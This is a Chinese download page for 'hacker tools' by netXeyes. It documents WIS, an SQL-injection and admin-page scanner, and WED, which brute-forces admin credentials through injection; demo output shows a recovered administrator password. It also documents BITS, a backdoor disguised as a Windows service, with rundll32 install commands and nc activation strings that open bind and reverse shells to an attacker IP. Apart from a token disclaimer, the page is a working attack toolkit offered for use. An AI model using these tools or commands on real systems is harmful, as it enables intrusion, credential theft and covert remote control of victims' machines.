下载 · 资讯 · 小游戏类 · 街机游戏 · 防火墙 · 最新更新 · 下载分类 · 排行榜 · 国产软件 · 国外软件 · ·
软件搜索:    
您的位置:下载首页应用软件黑客工具 → 小榕---SQL注入工具
本类月下载排行
本类周下载排行
小榕---SQL注入工具
软件大小:128 KB
软件语言:简体中文
软件类别:国产软件 / 免费版 / 黑客工具
运行环境:Win2003, WinXP, Win2000, NT, WinME
添加时间:2006-5-7 12:28:17
更新时间:2006-5-7 12:38:30
软件评级:
会员级别:匿名用户
下载统计:本日:1 本周:25 本月:75 总计:2557
软件简介
声明:
本工具仅仅提供站长监测网站漏洞使用,请不要用作其它用途.
工具包中总有两个小程序:"wed.exe"和"wis.exe",其中"wis.exe"是用来扫描某个站点中是否存在SQL注入漏洞的;"wed.exe"则是用来破解SQL注入用户名密码的。两个工具的使用都非常简单,结合起来,就可以完成从寻找注入点到注入攻击完成的整个过程。
[WED] 2004/08/29 

WED (Web Entry Detector),针对存在SQL Injection的网站对管理帐号进行扫描。 

Demo: 对通过WIS扫描出的存在SQL Injection漏洞的网站进行后台管理帐号扫描 

C:\>WED.exe http://www.someaspsite.com/shownews.asp?newsid=1544 

Web Entry Detector, Ver 1.0 by netXeyes, 2004/08/26 
http://www.netXeyes.com, security@vip.sina.com 

#### Phrase 0: Check Enviroment #### 
Get Row 1, Set Sensitive 250, Max Threads is 30 
File C:\TableName.dic Opened 
File C:\UserField.dic Opened 
File C:\PassField.dic Opened 

#### Phrase 1: Process Argv #### 
Host:www.someaspsite.com 
Page:/shownews.asp?newsid=1544 

#### Phrase 2: Detect SQL Injection #### 
SQL Injection Detected. 

#### Phrase 3: Get Cookies #### 
Tag: 2017 
Cookie: ASPSESSIONIDSADSBTAS=BIMAMMNCLCCIFICPLNEMFKND; path=/ 

#### Phrase 4: Starting Get Table Name #### 
Tag: 45 
Got Table Name is "users" 

#### Phrase 5: Starting Get Name Field #### 
Tag: 45 
Got Name Field is "name" 

#### Phrase 6: Starting Get Length of Field "name" #### 
Tag: 24 
Got Length of Field "name" is: 13 

#### Phrase 7: Starting Get Password Field #### 
Tag: 45 
Got Password Field is "pwd" 

#### Phrase 8: Starting Get Length of Field "pwd" #### 
Tag: 24 
Got Length of Field "pwd" is: 9 

#### Phrase 9: Starting Brute Field "name" and "pwd" (Access Mode) #### 

name is: administrator 
pwd is: admin@bvn 

C:\> 

到这一步,就可以通过WIS扫描获得的管理页面后台登陆了。 

[WIS] 2004/08/29 

WIS (Web Injection Scanner),自动对整个网站进行SQL Injection 脆弱性扫描,并且能够扫描后台登陆界面。 

Demo1: 扫描整个网站,找出存在SQL Injection的页面 

C:\>wis http://www.someaspsite.com/ 

Web Injection Scanner (Protype 0.4) 
by netXeyes, 2004.05.08 http://www.netXeyes.com security@vip.sina.com 
  

Scanning http://www.someaspsite.com/, Page: Unlimited 
Patient, Please.... 

(001 + 000) Checking: /shownews.asp?newsid=204 
SQL Injection Found: /shownews.asp?newsid=204 

Injection Page Final Result: 
============================ 
/shownews.asp?newsid=204 

C:\> 

Demo2: 扫描后台管理页面 

C:\>wis http://www.someaspsite.com/ /A 

Web Injection Scanner (Protype 0.4) 
by netXeyes, 2004.05.08 http://www.netXeyes.com security@vip.sina.com 

Scanning http://www.someaspsite.com/, Page: Unlimited, Detect Access Page 
Patient, Please.... 

(004 + 005) Access Page: /www.asp 
(004 + 006) Access Page: /wwwstats.asp 
(004 + 006) Access Page: /wwwlog.asp 
(004 + 006) Access Page: /wstats.asp 
(004 + 006) Access Page: /work.asp 
(005 + 007) Access Page: /webstats.asp 
(000 + 016) Access Page: /gansu2/tjhg.files/admin_index.asp 
(000 + 015) Access Page: /gansu2/tjhg.files/admin.asp 
(000 + 012) Access Page: /gansu2/gs.files/admin_index.asp 
(000 + 011) Access Page: /gansu2/gs.files/index_admin.asp 
(000 + 010) Access Page: /gansu2/tjhg.files/admin_del.asp 
(000 + 009) Access Page: /gansu2/ddddd.files/manage.asp 
(000 + 003) Access Page: /gansu2/ddddd.files/index_admin.asp 

Access Page Final Result: 
============================ 
/gansu2/login.asp (200 OK) 

Scan Finished 

C:\> 

[BITS] 2003/09/16 

BITS(Beat IT Security?),对商业的IT Security开始觉得厌倦了,So,Let's Beat IT Security :-)。 

BITS其实是Background Intelligent Transfer Service的缩写,让我们暂时借用这个服务和名字吧,因为BITS是一个冒名顶替的后门,也可以在不知不觉中实现另一种意义的Background Intelligent Transfer Service。 

这个后门是根据Bingle的关于svchost的原理写的,Thanks to Bingle。 

特点: 

进程管理器中看不到 

平时没有端口,只是在系统中充当卧底的角色 

提供正向连接和反向连接两种功能 

仅适用于Windows2000/XP/2003 

安装: 

在Administrators的权限下或者LocalSystem下: 

rundll32.exe BITS.dll,Install <Active Strings> 

Active Strings是用户自己指定的一个特征字符串,用于激活BITS。 

卸载: 
rundll32.exe BITS.dll,Uninstall 
重启系统 

通常情况下安装和卸载无论成功或者失败都不会有提示。 

正向连接: 

1、用nc连接目标主机的任何一个TCP端口(80/139/445.....) 
2、按照以下格式输入激活命令 
<Active Strings>@dancewithdolphin[xell]:<PORT> 
例如,在安装的时候设定了Active Strings为BITS Door,将CMD绑定在端口99: 
BITS Door@dancewithdolphin[xell]:99 

这样目标主机就会将CMD绑定在99。 
3、连接目标主机的指定端口(上例中为99) 

反向连接: 

很多情况下主机是在防火墙后面的,这样就需要用反向连接。 

1、在本地使用NC监听(如:nc -l -p 1234) 
2、用nc连接目标主机的任何一个防火墙允许的TCP端口(80/139/445.....) 
3、按照以下格式输入激活命令 
<Active Strings>@dancewithdolphin[rxell]:<Your IP>:<Listen Port> 
例如,在安装的时候设定了Active Strings为BITS Door,本机地址为1.1.1.1, nc在1234 
端口监听: 
BITS Door@dancewithdolphin[rxell]:1.1.1.1:1234 
4、目标主机的CMD将会出现在NC监听的端口1234。 

注意:所有的输入都区分大小写。 

Example: 

C:\My Documents>nc 219.237.63.199 139 
securitystrings@dancewithdolphin[xell]:7 


C:\My Documents>nc 219.237.63.199 7 
廙icrosoft Windows 2000 [Version 5.00.2195] 
(C) 版权所有 1985-2000 Microsoft Corp. 

C:\WINNT\system32> 

如果没有成功,可以尝试在安装的时候使用: 

rundll32.exe BITS.dll,Install rasauto <Active Strings>  
下载地址

·点击进入下载页面
注意事项
·如果您下载的软件需要解压密码,请和站长联系。
·为了保证您能快速下载,推荐使用网际快车等专用工具。
·为确保所下载软件能正常使用,请使用WinRAR V3.4或更高版本解压软件。
·所有软件均为本地连接,如您发现软件不能下载,请向站长QQ:107465434反映。
·本站所提供的一切资源均由网上搜集,若无意中侵犯到您的权利,敬请来信联系我们。